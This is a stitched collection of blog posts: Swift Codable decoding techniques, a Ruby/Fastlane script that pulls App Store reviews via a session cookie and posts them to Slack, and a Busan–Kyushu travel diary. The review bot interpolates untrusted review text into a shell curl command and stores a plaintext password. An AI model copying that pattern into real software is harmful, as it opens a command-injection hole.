    var file: OptionalValue<String>?

    init(from decoder: Decoder) throws {
        let container = try decoder.container(keyedBy: CodingKeys.self)

        self.id = try container.decode(Int.self, forKey: .id)

        if container.contains(.file) {
            self.file = try container.decode(OptionalValue<String>.self, forKey: .file)
        } else {
            self.file = nil
        }
    }
}

var jsonData = """
{
    "id":1
}
""".data(using: .utf8)!
var result = try! JSONDecoder().decode(Song.self, from: jsonData)
print(result)

jsonData = """
{
    "id":1,
    "file":null
}
""".data(using: .utf8)!
result = try! JSONDecoder().decode(Song.self, from: jsonData)
print(result)

jsonData = """
{
    "id":1,
    "file":"https://test.com/m.mp3"
}
""".data(using: .utf8)!
result = try! JSONDecoder().decode(Song.self, from: jsonData)
print(result)
The example is simplified to only include the id and file data fields.
The Song Entity implements its own decoding method, using the contains(.KEY) method to determine whether the response includes the field (regardless of its value). If it does, it decodes it into OptionalValue; within the OptionalValue enum, it decodes the actual value we want. If the value is successfully decoded, it is placed in .value(T); if the value is null (or decoding fails), it is placed in .null.
This way, we can distinguish whether the field is provided or not, and when writing to Core Data, we can determine whether to update the field to null or not update this field at all.
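As a minimal sketch of that write decision (the StoredSong class and applyFileChange function below are hypothetical stand-ins for the real NSManagedObject update code):

// Hypothetical local storage model standing in for the NSManagedObject.
final class StoredSong {
    var file: String?
}

// Decide how to apply the decoded `file` field to the stored record.
func applyFileChange(from entity: Song, to storedSong: StoredSong) {
    switch entity.file {
    case .none:
        break                      // field not provided at all -> keep the existing value
    case .some(.null):
        storedSong.file = nil      // field explicitly null -> clear the stored value
    case .some(.value(let file)):
        storedSong.file = file     // field has a value -> update it
    }
}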
A double Optional (an Optional of an Optional, e.g. String??) seems quite suitable for handling this scenario in Swift.
struct Song: Decodable {
    var id: Int
    var name: String??
    var file: String??
    var coverImage: String??
    var likeCount: Int??
    var like: Bool??
    var length: Int??
}
However… JSONDecoder decodes both double Optionals and plain Optionals through decodeIfPresent, treating them the same with no special handling for the double Optional, so the result remains the same as before.
Initially, it was thought that Property Wrapper could be used for elegant encapsulation, such as:
@OptionalValue var file: String?
But before delving into the details, it was found that Codable Property fields marked with Property Wrapper require the API response to have that field, otherwise, a keyNotFound error will occur, even if the field is Optional. ?????
There is also a discussion thread on the official forum regarding this issue… It is estimated that this will be fixed in the future.
Therefore, when choosing packages like BetterCodable or CodableWrappers, consider the current issue with Property Wrapper.
import Foundation

struct Song: Decodable {
    enum CodingKeys: String, CodingKey {
        case id
        case name
        case like
    }

    var id: Int
    var name: String?
    var like: Bool?

    init(from decoder: Decoder) throws {
        let container = try decoder.container(keyedBy: CodingKeys.self)
        self.id = try container.decode(Int.self, forKey: .id)
        self.name = try container.decodeIfPresent(String.self, forKey: .name)

        // Use try? so that a Bool value falls through to the next branch instead of throwing.
        if let intValue = try? container.decodeIfPresent(Int.self, forKey: .like) {
            self.like = (intValue == 1) ? true : false
        } else if let boolValue = try? container.decodeIfPresent(Bool.self, forKey: .like) {
            self.like = boolValue
        }
    }
}

var jsonData = """
{
    "id": 1,
    "name": "告五人",
    "like": 0
}
""".data(using: .utf8)!
var result = try! JSONDecoder().decode(Song.self, from: jsonData)
print(result)
Extending the previous section, we can implement init(from decoder:) ourselves, decode the value as Int or Bool, and then assign it manually. This way, the original field can accept 0/1/true/false.
If you don’t want to create your own Decoder, you can override the original JSON Decoder to add more functionality.
We can extend KeyedDecodingContainer and define public methods ourselves. Swift will prioritize executing the methods we redefine under the module, overriding the original Foundation implementation.
This affects the entire module.
And it’s not a true override, you can’t call super.decode, and be careful not to call yourself (e.g., decode(Bool.Type, forKey) in decode(Bool.Type, forKey)).
There are two decode methods:
Example 1. The main issue mentioned earlier can be directly extended:
extension KeyedDecodingContainer {
    public func decodeIfPresent<T>(_ type: T.Type, forKey key: Self.Key) throws -> T? where T : Decodable {
        //better:
        switch type {
        case is OptionalValue<String>.Type,
             is OptionalValue<Int>.Type:
            return try? decode(type, forKey: key)
        default:
            // Careful: returning nil here makes every other Optional field in this module decode as nil;
            // in practice you would fall back to `return try? decode(type, forKey: key)` instead.
            return nil
        }
        // or just return try? decode(type, forKey: key)
    }
}

struct Song: Decodable {
    var id: Int
    var file: OptionalValue<String>?
}
Since the main issue is with Optional data fields of Decodable types, we override the decodeIfPresent<T: Decodable> method.
It is speculated that the original implementation of decodeIfPresent returns nil when the data is null or the response does not provide the field, without actually running decode.
So the principle is simple: as long as the Decodable type is OptionalValue<T>, we always try to decode it, which lets us capture the different states. In fact, not checking the Decodable type also works; it just means all Optional fields will go through the decode attempt.
Example 2. Problem scenario 1 can also be extended using this method:
extension KeyedDecodingContainer {
    public func decodeIfPresent(_ type: Bool.Type, forKey key: KeyedDecodingContainer<K>.Key) throws -> Bool? {
        // Use decode(...) here, not decodeIfPresent(Bool...), otherwise this method would call itself recursively.
        if let intValue = try? decode(Int.self, forKey: key) {
            return (intValue == 1) ? true : false
        } else if let boolValue = try? decode(Bool.self, forKey: key) {
            return boolValue
        }
        return nil
    }
}

struct Song: Decodable {
    enum CodingKeys: String, CodingKey {
        case id
        case name
        case like
    }

    var id: Int
    var name: String?
    var like: Bool?
}

var jsonData = """
{
    "id": 1,
    "name": "告五人",
    "like": 1
}
""".data(using: .utf8)!
var result = try! JSONDecoder().decode(Song.self, from: jsonData)
print(result)
Codable has been used in various tricky ways, some of which are quite convoluted because Codable’s constraints are too strong, sacrificing much of the flexibility needed in real-world development. In the end, you might even start to question why you chose Codable in the first place, as the advantages seem to diminish…
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using Ruby+Fastlane-SpaceShip to build an APP review tracking notification Slack bot
Photo by Austin Distel
I recently discovered that the bot in Slack that forwards the latest APP reviews is a paid service. I always thought this feature was free. The cost ranges from $5 to $200 USD/month because each platform offers more than just the “App Review Bot” feature. They also provide data statistics, records, unified backend, competitor comparisons, etc. The cost is based on the services each platform can provide. The Review Bot is just one part of their offerings, but I only need this feature and nothing else. Paying for it seems wasteful.
I originally used the free open-source tool TradeMe/ReviewMe for Slack notifications, but this tool has been outdated for a long time. Occasionally, Slack would suddenly send out some old reviews, which was quite alarming (many bugs had already been fixed, making us think there were new issues!). The reason was unclear.
So, I considered finding other tools or methods to replace it.
We have now redesigned the App Reviews Bot using the new App Store Connect API and relaunched it as "ZReviewTender — a free open-source App Reviews monitoring bot".
====
App Store Connect API now supports reading and managing Customer Reviews. The App Store Connect API natively supports accessing App reviews, no longer requiring Fastlane — Spaceship to fetch reviews from the backend.
With the motivation in place, let’s explore the principles to achieve the goal.
Apple provides the App Store Connect API, but it does not offer a feature to fetch reviews.
[2022/07/20 Update]: App Store Connect API now supports reading and managing Customer Reviews
Apple provides a public APP review RSS subscription URL, and it offers both rss xml and json formats.
https://itunes.apple.com/country_code/rss/customerreviews/id=APP_ID/page=1/sortBy=mostRecent/json
mostRecent/json requests the most recent reviews in JSON format; you can also change it to mostRecent/xml for XML format. The returned review data looks as follows:
rss.json:
{
    "author": {
        "uri": {
            "label": "https://itunes.apple.com/tw/reviews/id123456789"
        },
        "name": {
            "label": "test"
        },
        "label": ""
    },
    "im:version": {
        "label": "4.27.1"
    },
    "im:rating": {
        "label": "5"
    },
    "id": {
        "label": "123456789"
    },
    "title": {
        "label": "Great presence!"
    },
    "content": {
        "label": "Life is worth it~",
        "attributes": {
            "type": "text"
        }
    },
    "link": {
        "attributes": {
            "rel": "related",
            "href": "https://itunes.apple.com/tw/review?id=123456789&type=Purple%20Software"
        }
    },
    "im:voteSum": {
        "label": "0"
    },
    "im:contentType": {
        "attributes": {
            "term": "Application",
            "label": "Application"
        }
    },
    "im:voteCount": {
        "label": "0"
    }
}
Advantages:
Disadvantages:
The biggest problem we encountered is 3; but it is uncertain whether this is an issue with the Bot tool we are using or with the RSS URL data.
This method is somewhat unconventional and was discovered by a sudden inspiration; but after referring to other Review Bot practices, I found that many websites also use it this way, so it should be fine, and I saw tools doing this 4-5 years ago, just didn’t delve into it at the time.
Advantages:
Disadvantages:
Step 1 — Sniff the API that loads the review section of App Store Connect backend:
You can fetch review data from the Apple backend by hitting:
https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/APP_ID/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT
This endpoint retrieves the review list:
index = page offset, up to 100 entries per page.
The returned review data is as follows:
private.json:
{
    "value": {
        "id": 123456789,
        "rating": 5,
        "title": "Great presence!",
        "review": "Life is worth it~",
        "created": null,
        "nickname": "test",
        "storeFront": "TW",
        "appVersionString": "4.27.1",
        "lastModified": 1618836654000,
        "helpfulViews": 0,
        "totalViews": 0,
        "edited": false,
        "developerResponse": null
    },
    "isEditable": true,
    "isRequired": false,
    "errorKeys": null
}
After testing, it was found that you only need to include cookie: myacinfo=<Token> to forge a request and obtain data:
We have the API and the required headers, now we need to automate the retrieval of this cookie information from the backend.
Step Two — The Versatile Fastlane
Since Apple now enforces full Two-Step Verification, automating login verification has become more cumbersome. Fortunately, the clever Fastlane has implemented everything from the official App Store Connect API, iTMSTransporter, to web authentication (including two-step verification). We can directly use Fastlane’s command:
fastlane spaceauth -u <App Store Connect Account (Email)>
This command will complete the web login verification (including two-step verification) and then store the cookie in the FASTLANE_SESSION file.
You will get a string similar to the following:
!ruby/object:HTTP::Cookie
name: myacinfo value: <token>
domain: apple.com for_domain: true path: "/"
secure: true httponly: true expires: max_age:
created_at: 2021-04-21 20:42:36.818821000 +08:00
accessed_at: 2021-04-21 22:02:45.923016000 +08:00
!ruby/object:HTTP::Cookie
name: <hash> value: <token>
domain: idmsa.apple.com for_domain: true path: "/"
secure: true httponly: true expires: max_age: 2592000
created_at: 2021-04-19 23:21:05.851853000 +08:00
accessed_at: 2021-04-21 20:42:35.735921000 +08:00
By including myacinfo = value, you can obtain the review list.
Step Three — SpaceShip
Initially, I thought Fastlane could only help us up to this point, and that we would have to manually glue together the flow of obtaining the cookie from Fastlane and then calling the API. However, after some exploration, I discovered that Fastlane's authentication module SpaceShip has even more powerful features!
SpaceShip already has a method for fetching the review list: Spaceship::TunesClient::get_reviews!
app = Spaceship::Tunes::login(appstore_account, appstore_password)
reviews = app.get_reviews(app_id, platform, storefront, versionId = '')
*storefront = region
Step Four — Assembly
Fastlane and Spaceship are both written in Ruby, so we also need to use Ruby to create this Bot tool.
We can create a reviewBot.rb file; to execute it, simply enter in the Terminal:
ruby reviewBot.rb
That’s it. ( *For more Ruby environment issues, refer to the tips at the end)
First, the original get_reviews method's parameters do not meet our needs: I want review data for all regions and all versions, without filtering, and with pagination support:
extension.rb:
# Extension Spaceship->TunesClient
module Spaceship
  class TunesClient < Spaceship::Client
    def get_recent_reviews(app_id, platform, index)
      r = request(:get, "ra/apps/#{app_id}/platforms/#{platform}/reviews?index=#{index}&sort=REVIEW_SORT_ORDER_MOST_RECENT")
      parse_response(r, 'data')['reviews']
    end
  end
end
So we extend a method in TunesClient, with parameters only including app_id, platform = ios (all lowercase), and index = pagination offset.
Next, assemble login authentication and fetch the review list:
get_recent_reviews.rb:
index = 0
breakWhile = true
while breakWhile
  app = Spaceship::Tunes::login(APPStoreConnect account (Email), APPStoreConnect password)
  reviews = app.get_recent_reviews($app_id, $platform, index)
  if reviews.length() <= 0
    breakWhile = false
    break
  end
  reviews.each { |review|
    index += 1
    puts review["value"]
  }
end
Use while to traverse all pages, and terminate when there is no content.
Next, add a record of the most recent review time, so that only new reviews that have not yet been notified get sent:
lastModified.rb:
lastModified = 0
if File.exists?(".lastModified")
  lastModifiedFile = File.open(".lastModified")
  lastModified = lastModifiedFile.read.to_i
end
newLastModified = lastModified
isFirst = true
messages = []

index = 0
breakWhile = true
while breakWhile
  app = Spaceship::Tunes::login(APPStoreConnect account (Email), APPStoreConnect password)
  reviews = app.get_recent_reviews($app_id, $platform, index)
  if reviews.length() <= 0
    breakWhile = false
    break
  end
  reviews.each { |review|
    index += 1
    if isFirst
      isFirst = false
      newLastModified = review["value"]["lastModified"]
    end

    if review["value"]["lastModified"] > lastModified && lastModified != 0
      # Do not send notifications the first time
      messages.append(review["value"])
    else
      breakWhile = false
      break
    end
  }
end

messages.sort! { |a, b| a["lastModified"] <=> b["lastModified"] }
messages.each { |message|
  notify_slack(message)
}

File.write(".lastModified", newLastModified, mode: "w+")
Simply use a .lastModified file to record the timestamp obtained during the last execution.
*Do not send notifications the first time, otherwise, it will spam
The final step, assemble the push message & send it to Slack:
slack.rb:
# Slack Bot
def notify_slack(review)
  rating = review["rating"].to_i
  color = rating >= 4 ? "good" : (rating >= 2 ? "warning" : "danger")
  like = review["helpfulViews"].to_i > 0 ? " - #{review["helpfulViews"]} :thumbsup:" : ""
  date = review["edited"] == false ? "Created at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}" : "Updated at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}"

  isResponse = ""
  if review["developerResponse"] != nil && review["developerResponse"]['lastModified'] < review["lastModified"]
    isResponse = " (Response outdated)"
  end

  edited = review["edited"] == false ? "" : ":memo: User updated review#{isResponse}:"

  stars = "★" * rating + "☆" * (5 - rating)
  attachments = {
    :pretext => edited,
    :color => color,
    :fallback => "#{review["title"]} - #{stars}#{like}",
    :title => "#{review["title"]} - #{stars}#{like}",
    :text => review["review"],
    :author_name => review["nickname"],
    :footer => "iOS - v#{review["appVersionString"]} - #{review["storeFront"]} - #{date} - <https://appstoreconnect.apple.com/apps/APP_ID/appstore/activity/ios/ratingsResponses|Go To App Store>"
  }
  payload = {
    :attachments => [attachments],
    :icon_emoji => ":storm_trooper:",
    :username => "ZhgChgLi iOS Review Bot"
  }.to_json
  cmd = "curl -X POST --data-urlencode 'payload=#{payload}' SLACK_WEB_HOOK_URL"
  system(cmd, :err => File::NULL)
  puts "#{review["id"]} send Notify Success!"
end
SLACK_WEB_HOOK_URL = Incoming WebHook URL
appreviewbot.rb:
require "Spaceship"
+require 'json'
+require 'date'
+
+# Config
+$slack_web_hook = "Target notification web hook url"
+$slack_debug_web_hook = "Notification web hook url when the bot has an error"
+$appstore_account = "APPStoreConnect account (Email)"
+$appstore_password = "APPStoreConnect password"
+$app_id = "APP_ID"
+$platform = "ios"
+
+# Extension Spaceship->TunesClient
+module Spaceship
+ class TunesClient < Spaceship::Client
+ def get_recent_reviews(app_id, platform, index)
+ r = request(:get, "ra/apps/#{app_id}/platforms/#{platform}/reviews?index=#{index}&sort=REVIEW_SORT_ORDER_MOST_RECENT")
+ parse_response(r, 'data')['reviews']
+ end
+ end
+end
+
+# Slack Bot
+def notify_slack(review)
+ rating = review["rating"].to_i
+ color = rating >= 4 ? "good" : (rating >= 2 ? "warning" : "danger")
+ like = review["helpfulViews"].to_i > 0 ? " - #{review["helpfulViews"]} :thumbsup:" : ""
+ date = review["edited"] == false ? "Created at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}" : "Updated at: #{Time.at(review["lastModified"].to_i / 1000).to_datetime}"
+
+
+ isResponse = ""
+ if review["developerResponse"] != nil && review["developerResponse"]['lastModified'] < review["lastModified"]
+ isResponse = " (Customer service response is outdated)"
+ end
+
+ edited = review["edited"] == false ? "" : ":memo: User updated review#{isResponse}:"
+
+ stars = "★" * rating + "☆" * (5 - rating)
+ attachments = {
+ :pretext => edited,
+ :color => color,
+ :fallback => "#{review["title"]} - #{stars}#{like}",
+ :title => "#{review["title"]} - #{stars}#{like}",
+ :text => review["review"],
+ :author_name => review["nickname"],
+ :footer => "iOS - v#{review["appVersionString"]} - #{review["storeFront"]} - #{date} - <https://appstoreconnect.apple.com/apps/APP_ID/appstore/activity/ios/ratingsResponses|Go To App Store>"
+ }
+ payload = {
+ :attachments => [attachments],
+ :icon_emoji => ":storm_trooper:",
+ :username => "ZhgChgLi iOS Review Bot"
+ }.to_json
+ cmd = "curl -X POST --data-urlencode 'payload=#{payload}' #{$slack_web_hook}"
+ system(cmd, :err => File::NULL)
+ puts "#{review["id"]} send Notify Success!"
+ end
+
+begin
+ lastModified = 0
+ if File.exists?(".lastModified")
+ lastModifiedFile = File.open(".lastModified")
+ lastModified = lastModifiedFile.read.to_i
+ end
+ newLastModified = lastModified
+ isFirst = true
+ messages = []
+
+ index = 0
+ breakWhile = true
+ while breakWhile
+ app = Spaceship::Tunes::login($appstore_account, $appstore_password)
+ reviews = app.get_recent_reviews($app_id, $platform, index)
+ if reviews.length() <= 0
+ breakWhile = false
+ break
+ end
+ reviews.each { |review|
+ index += 1
+ if isFirst
+ isFirst = false
+ newLastModified = review["value"]["lastModified"]
+ end
+
+ if review["value"]["lastModified"] > lastModified && lastModified != 0
+ # Do not send notification on first use
+ messages.append(review["value"])
+ else
+ breakWhile = false
+ break
+ end
+ }
+ end
+
+ messages.sort! { |a, b| a["lastModified"] <=> b["lastModified"] }
+ messages.each { |message|
+ notify_slack(message)
+ }
+
+ File.write(".lastModified", newLastModified, mode: "w+")
+rescue => error
+ attachments = {
+ :color => "danger",
+ :title => "AppStoreReviewBot Error occurs!",
+ :text => error,
+ :footer => "*Due to Apple's technical limitations, the precise rating crawling function needs to be re-logged in and set approximately every month. We apologize for the inconvenience."
+ }
+ payload = {
+ :attachments => [attachments],
+ :icon_emoji => ":storm_trooper:",
+ :username => "ZhgChgLi iOS Review Bot"
+ }.to_json
+ cmd = "curl -X POST --data-urlencode 'payload=#{payload}' #{$slack_debug_web_hook}"
+ system(cmd, :err => File::NULL)
+ puts error
+end
+
Additionally, a begin…rescue (try…catch) protection is added. If an error occurs, a Slack notification will be sent for us to check (mostly due to session expiration).
Finally, just add this script to crontab / schedule and other scheduling tools to execute it regularly!
Effect picture:
(See fastlane's documentation note about session duration; the spaceauth session only stays valid for a limited time, roughly a month, before you need to log in again.)
⚠️Whether free, paid, or self-hosted as mentioned in this article; do not use a developer account, be sure to create a separate App Store Connect account with only “Customer Support” permissions to prevent security issues.
It is recommended to use rbenv to manage Ruby, as the system’s built-in version 2.6 can easily cause conflicts.
If you encounter GEM or Ruby environment errors on macOS Catalina, you can refer to this reply to solve them.
After the above journey, I have a better understanding of how the Slack Bot works and how the iOS App Store crawls review content. I also got to play around with ruby! It feels great to write!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Boarding the New Camellia ferry from Busan, South Korea to Fukuoka, Japan, visiting Yufuin, Oita, Fukuoka, Shimonoseki, Ijima, and Sasebo; a total of 11 days
Taking advantage of the brief gap between wrapping up one phase of work and starting a new job to catch a short breather in Japan: I resigned on 5/30, departed on 6/3, returned on 6/13, and the new job started on 6/24, so the timing worked out perfectly; only during a job transition could I take a relatively long break (11 days in total). This was a solo trip in disguise, teaming up with James Lin (Ex-Binance Android Developer, job referrals are welcome), whom I traveled with to Tokyo last year. It was my second visit to Kyushu, having covered the must-see attractions of Fukuoka, Kumamoto, and Nagasaki last September; this time I mainly visited the places I missed last time, so my itinerary differs from James's and we went our separate ways.
The following are places I visited last time that I may not revisit this trip. For those interested in learning more about Kyushu, please refer to my previous travelogue "2023 Kyushu 10-Day Solo Trip".
To summarize the lesson of this trip up front: "independent travel is a process of continuously paying tuition (time or money) to learn; the more experience you gain, the fewer pitfalls you will hit."
[Japan JR PASS | Kyushu Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/en/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/en/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Fukuoka, Japan | Hakata Port - Busan Port | Camellia Line Cargo Passenger Ferry](https://www.kkday.com/en/product/138770-cargo-passenger-ferry-new-camellia-fukuoka-hakata-port-busan-port?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
The main purpose of this trip is to take the Camellia Line Cargo Passenger Ferry from Busan, South Korea to Fukuoka, Japan and visit Yufuin, Oita Beppu, and Miyazaki Prefecture - Takachiho.
The pre-trip plan is as follows: (Planned the day before departure, actual order may not follow the plan, didn’t go to Minami Aso as it was too far)
This time, I bought DJB for internet, 2 days 2GB in Korea, unlimited data for 9 days in Japan, total NT$1,250.
Takachiho Gorge is extremely difficult to reach from Fukuoka, so I directly signed up for the KKDAY Takachiho Gorge Day Tour, which includes transportation, lunch, and a Chinese tour guide, priced at NT$2,272 per person.
✈️ Flights
Price: NT$10,480
🛳️ Cruise New Camellia
Price: Economy/2nd class cabin: shared cabin
NT$1,450 per person
🚅 JR Pass Northern Kyushu Rail Pass (5 Days)
Price: NT$3,042
When using the JR Pass in Kyushu this time, you can take the limited express train directly, except for specific reserved seats, all other seats are in the unreserved car (not crowded, seats available).
The Yufuin no Mori from Hakata to Yufuin was not available, so I could only reserve a seat on Yufu 1.
Please note that Yufuin no Mori is different from the regular train (Yufu X), so when making a reservation, make sure it is for Yufuin no Mori.
Reservation Method:
You must purchase the JR Pass before making a reservation. Since the only option for travel agency selection is KLOOK, and I was afraid that other agencies might not be able to make reservations (the page says that guests who do not have MCO issued by the above travel agencies should not make any selections. It should be fine), I bought the JR Pass from KLOOK.
1. Go to JR Pass Reservation Homepage:
Scroll down to find “Rail Pass Purchase” -> “Inquiry/Change/Refund”
2. Go to JR Pass Reservation Page :
Select “Register”
Read and agree to the terms, click “Proceed to Next Page”
Enter your email for registration, click “Register”.
Check your email for the temporary password and click the continue link.
1. Select Travel Agency Name: KLOOK
2. KRP Reservation Number/MCO Number
Enter KLOOK to view the JR Pass certificate and copy the following certificate number.
Enter the name on the JR Pass order. According to the instructions, if the voucher is issued by KLOOK, you should enter the first name + last name. So, even though my voucher is written as LI ZXXX CXXX, you should fill in ZXXX CXXX LI here.
Enter the temporary password in the email.
After setting the password, you can check and reserve train seats on the homepage during the available reservation time (05:30 to 23:00 Japan time); reservations cannot be made outside of this time.
Yufuin no Mori is fully booked, so you can only reserve the regular train Yufu 1, departing at 07:43 and arriving at 10:03.
Continue to the next page to select seat preferences, location, and car.
Enter the start date of using the rail pass.
Enter credit card information to pay the reservation fee (¥1,000 for adults / ¥500 for children per person).
The above is the credit card of the purchaser. When collecting tickets at the counter, you must bring and present the credit card used for payment.
Therefore, please be sure to bring the credit card to collect the tickets ⚠️
Checkout, reservation completed!
Total: $14,291, averaging $1,400 per night. This time, finally managed to stay under $1,500 per night, thanks to Toyoko INN!
During my stay at Toyoko INN in Hiroshima, I signed up for membership. Simply inform the front desk during check-in, fill out some information, pay the one-time membership fee of 1,500 Japanese Yen, take a photo on the spot, and you can start using it.
For using Naver Map in Korea, you can plan your itinerary and routes in advance for easy access:
Visit Japan has now combined entry and customs into one QR code.
Similar to previous trips abroad, when arriving at Taipei Main Station A1 via Airport MRT, I first handle advance check-in to go through immigration directly at the airport. (For flights eligible for advance check-in and regulations, please refer to the official website).
Initially planned to take the Orange Line to transfer at Sanchong for Airport MRT, but the other advance check-in station for Airport MRT is at A3 New Taipei Industrial Park Station, not Sanchong Station, and there are no direct trains from Sanchong, so I opted to transfer at Taipei Main Station.
This time, flying to Busan with China Airlines from Terminal 1.
Upon arrival at the airport, I exchanged currency for Korean Won at the counter. Most ATMs only dispense Japanese Yen, and the airport exchange rate is unfavorable with an additional NT$100 handling fee, so it’s recommended to exchange currency at a bank in advance if time permits.
Completed departure procedures around 13:00.
Bought a crispy chicken lunch upon departure from Terminal 1.
Previously, the scenic rest area was closed when passing by, but this time it was open for a visit, although quite small.
As it was still early, I took the opportunity to rest at the free VIP lounge in Terminal 1, which was not crowded at that time.
The fried chicken at the top is marinated and very delicious, but unfortunately this airport doesn’t offer the “Gua Gua Bao”; also found that all the charging outlets here have been removed, only the shells are left, unable to charge.
Inside, there are both bathrooms and toilets, not many in number (estimated about five), very clean and high-end, and the cleaning staff cleans them in a very timely manner.
Boarding is expected to start around 15:20.
The BR terminal at the first terminal requires a transfer by shuttle bus to the boarding gate for the flight to Busan, and there aren’t many people on this flight to Busan! As shown in the picture, estimated to be less than 30 people.
The flight to Busan operated by China Airlines is on a 737-800 medium-sized aircraft, without entertainment screens, Bye Taiwan!
Can only rely on onboard WiFi to access entertainment content, there are quite a few movies! There’s “Rush”! The airplane meal is Three-Cup Chicken Noodles (quite bad), unexpectedly there is a collaboration between China Airlines, Five Tung Blossoms, and Dinotaeng Quokka, and received a short-tailed kangaroo snack.
Fill out the entry card, customs declaration card, and pre-apply for the quarantine QR Code, if not applied, you will need to fill out an additional quarantine card.
The daytime temperature in South Korea is about 20-25 degrees, it may drop below 20 degrees at night; somewhat like the autumn season in Taiwan.
Around 19:20, went through immigration, picked up luggage, and exited the airport.
At the time I misunderstood the relationship between WOWPASS and T-money and thought they only came as a combined card. My understanding was that WOWPASS is a stored-value cash card covering top-up, currency exchange, cash withdrawal, and shopping, while T-money is a transit card, and that WOWPASS includes T-money. In fact, for transit you only need to buy T-money, not WOWPASS; I hadn't figured that out yet and kept looking for a WOWPASS machine instead of T-money, and there are no WOWPASS machines at Gimhae International Airport. So I first bought a ticket with cash and took the subway all the way to Busan.
From Gimhae Airport to Busan Station, you need to transfer three times on the subway; there weren’t many people getting off, so it wasn’t crowded.
Follow the floor signs to the platform.
Purchase a second ticket to Seomyeon Station.
Transferring from the Green Line to the Orange Line does not require passing back through the fare gates. I wasn't sure at the time whether the Green Line machines could sell a ticket all the way to Busan Station (I didn't pay attention), so I couldn't exit at Busan Station and needed staff assistance to get out.
Upon exiting, you will find Dongbang INN Busan Station No. 1 store.
Store your luggage and go out to find food.
In the hotel lobby, there is a Wowpass machine. Scan your passport, follow the instructions, and the machine will dispense a Wowpass+Tmoney combined card.
The bottom part is T-money; remember to tap the bottom part when taking the subway or bus. My first attempt to tap the whole card failed; it seems I was scanning the WOWPASS part.
If you want to see the details of T-money top-ups and deductions, you need to install another app (BucaCheck):
If this travelogue is helpful to you, you can enter my invitation code
373TBH87
when registering on Wowpass.
After dinner, go to GS 25 to buy Korean beer and Korean snacks. Kelly is delicious, the one on the right is like spicy strips but not as salty and spicy, suitable for drinking, and the crab-flavored biscuits are average.
Rest, end of the busy Day 1.
Early in the morning, take bus 1001 from the Busan Station bus stop to Haedong Yonggungsa Temple; frequent schedules, not many people.
The journey is a bit far, about 1 and a half hours. Korean buses are similar to those in Taiwan, and the drivers drive quite aggressively; normally, people get on at the front and get off at the back, but there are also people who get off at the front and get on at the back.
The opposite of the drop-off point is Skyline Luge Busan.
You can see the sign of Haedong Yonggungsa Temple by walking forward after getting off, turn right and walk up a hill road; the map says it takes 15 minutes to walk, but because it’s a hill road, it probably takes about 30 minutes to walk, or you can take a taxi if you don’t want to walk.
You will pass through a shopping street first, and there is also a place nearby similar to a container market where you can take a rest and eat something. When you enter, you can see a row of 12 zodiac representatives, (Dog) Year of the Dog.
You can see the colorful and distinctive archway of Haedong Yonggungsa Temple as you continue forward.
Be careful as you descend the stairs all the way to the main hall of Haedong Yonggungsa Temple.
You can first go to the left observation platform to overlook the entire temple.
Enter the main hall (Daeungjeon), where you can buy tiles outside to write your wishes on (10,000 KRW).
From the Haedong Yonggungsa Temple bus stop, take the 1001 bus back to Haeundae (about 1 hour).
On that sunny day, there was a sand sculpture exhibition on the beach.
Be careful when going down the stairs. Witnessed a Korean uncle stepping into the air and falling into the sand (fortunately it was the sand).
Heh.
Haeundae LCT, a landmark in Busan.
HAEUNDAE, clear skies.
Haeundae Beach has lifeguards, marked swimming areas, and water activities available.
Had lunch at a Korean BBQ restaurant near Haeundae, Baegnyeon Sikdang, where the staff grilled the meat for us. Ordered Korean beef sirloin and pork neck, both delicious, along with a stone pot rice dish. Shared between two people.
Also ordered Korean beer and soju to enjoy. (Forgot to try the grilled beer).
Next to it is the Haeundae Traditional Market, mainly selling local seafood. Bought an ice cream and walked around, then went to another shop selling ice cream croissants and had a matcha ice cream croissant (crispy outside, soft inside, delicious).
After eating, forgot that Haeundae also has a monorail train to ride and you can also visit Haeundae LCT (didn't check the Busan itinerary carefully at first). Around 14:00, took the 1001 bus back to Busan Station, thinking about where to go next or just explore Busan Station.
Back at Busan Station around 15:00, there was still a long time before the 18:30 cruise check-in. I found that there was nowhere much to shop around Busan Station itself (no department stores, shopping streets, or attractions nearby); Gamcheon Culture Village felt too far away, and I only then found out that a few subway stops from Busan Station you can reach Busan Tower, with department stores and shopping streets nearby.
Originally planned to go to Busan Tower but ended up walking too far from the subway station, so I gave up and returned.
KKday Busan | Yongdusan Park Busan Tower Observatory E-Ticket.
Bought the famous Korean banana milk to drink.
I wandered around near Busan Station until almost five o’clock, then went to the hotel to pick up my luggage and headed to Busan Port International Passenger Terminal.
Entering the Busan Station lobby (2nd floor), find exit 10, walk along the sky bridge to reach Busan Port International Passenger Terminal (about 15 minutes walk).
Do not walk on the ground-level roads, as there are many large vehicles, which is very dangerous.
The Busan Port Bridge during the day.
The Busan Port International Passenger Terminal (pier) is empty inside, not many people, because there are very few daily flights; apart from flights to Fukuoka Hakata, there are also cruises to Shimonoseki, Tsushima Island, Osaka, Kumamoto, etc.
From the lobby to the 3rd floor for departure, first go to New Camellia to exchange for ferry tickets. (Passport required)
Around 17:30, boarding began, the departure hall is quite large; you can actually wander around, buy food to bring on board to eat.
Things to note:
Departure opens at 18:30.
After passing through departure immigration, the waiting area for the ship is small, with a few duty-free shops and a cafe (the only place selling food). I bought a tuna sandwich to fill my stomach.
I went to the duty-free shop and bought some Korean Toms Gilim almond snacks (classic honey flavor, strawberry chocolate coating, tiramisu flavor) as souvenirs.
In the waiting area, you can line up your luggage in advance; everyone lines up their suitcases, getting ready to board the ship.
Probably about 90% of the people are Korean.
You can see Busan Port from the window, and when it’s almost time, everyone will return to their luggage to prepare to board the ship.
It takes about 15-20 minutes to walk from the pier to board the ship.
Room 430, go up to the 4th floor to room 430 after boarding.
